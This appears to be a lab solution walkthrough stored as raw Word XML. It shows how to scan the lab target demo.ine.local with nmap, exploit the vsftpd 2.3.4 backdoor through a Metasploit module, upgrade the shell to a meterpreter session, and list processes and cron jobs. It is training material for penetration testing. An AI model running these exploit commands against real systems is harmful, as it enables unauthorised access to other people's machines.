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CA7BB" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B781D" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8BDFCD" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> Enumerate the target machine to gather processes &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> jobs information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257FAAB" w14:textId="5406E22C" w:rsidR="00853ABF" w:rsidRDefault="00EA3A0E">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63383199" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3A25B" w14:textId="5D396CFA" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FCB9833" wp14:editId="229A84C8">
            <wp:extent cx="5943600" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="693383610" name="Picture 14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86CDA" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t> Port scanning with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44C155" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>Now that we have identified the target IP address, we can perform a port scan to identify vulnerable services running on the target system. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9C76C" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F246981" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22F04997" w14:textId="342FE5FA" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="409ACFC4" wp14:editId="51D2E4A6">
            <wp:extent cx="5943600" cy="2474595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="117788205" name="Picture 13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3E385" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">The Nmap scan reveals that the target has an FTP server running on port 21. The version column from the Nmap scan reveals that the FTP server is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> 2.3.4. This version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> is vulnerable to a backdoor command execution vulnerability and can be exploited with a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C51F7" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t> Gaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766132E4" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>Now that we have identified the vulnerable service running on the target, we can start the Metasploit Framework console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>) by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA3D95" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A494522" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE188B" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34307B9E" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43031E30" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A9DD58" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D64DE" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t> If the exploit didn't work on the first try, run the exploit again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153361B5" w14:textId="3D353EBB" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E217A22" wp14:editId="4D2CFC2B">
            <wp:extent cx="5943600" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1785855853" name="Picture 12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8140C" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">You can also obtain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> session on the target system by upgrading the command shell session. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55661282" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>(Put the current session in the background.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0F2B2" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB7EF7" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D29D93" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F3F40E" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6AD42" w14:textId="719A4005" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35571B5B" wp14:editId="43E89871">
            <wp:extent cx="5943600" cy="1922145"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1356941960" name="Picture 11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16D4F" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> Enumerating processes &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B293E" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">Now that we have gained access to the target system and have obtained a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> session, we can begin enumerating the processes and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> jobs running on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A1C8C" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">We can begin by enumerating the list of running processes on the target system, this can be done by running the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5E559" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C73E8" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BA74666" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">As shown in the following screenshot, the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>above mentioned</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> command will display a list of all running processes and their respective process IDs (PIDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B449CF4" w14:textId="62459BC7" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C143F4" wp14:editId="12BBA654">
            <wp:extent cx="5943600" cy="2478405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1284899375" name="Picture 10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63E0B" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>We can also find the PID of a specific service by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6FA26" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B774897" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A2898F4" w14:textId="37F8024A" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3658D5F0" wp14:editId="5B03B307">
            <wp:extent cx="5943600" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1991106808" name="Picture 9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0A926" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>The target system does not have the crontab utility installed, as a result, you will need to run the following commands on the Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5EED9" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve">We can enumerate the list of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t xml:space="preserve"> jobs on the Kali Linux system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08BEB7" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689620D" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>ls -al /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3A0E">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F835207" w14:textId="6437C9A8" w:rsidR="00EA3A0E" w:rsidRPr="00EA3A0E" w:rsidRDefault="00EA3A0E" w:rsidP="00EA3A0E">
      <w:r w:rsidRPr="00EA3A0E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09141A0E" wp14:editId="29A3FA07">
            <wp:extent cx="5943600" cy="4307205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="503352899" name="Picture 8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A9D6B" w14:textId="77777777" w:rsidR="00EA3A0E" w:rsidRDefault="00EA3A0E"/>
    <w:sectPr w:rsidR="00EA3A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C8A"/>
    <w:rsid w:val="00373C8A"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B27FF"/>
    <w:rsid w:val="00EA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273A8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B986889-D22C-46C7-A21F-CC2E3479A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C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C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C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C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C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C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C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C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C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362</Words>
  <Characters>2015</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>47</Lines>
  <Paragraphs>44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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-19T19:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-19T19:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>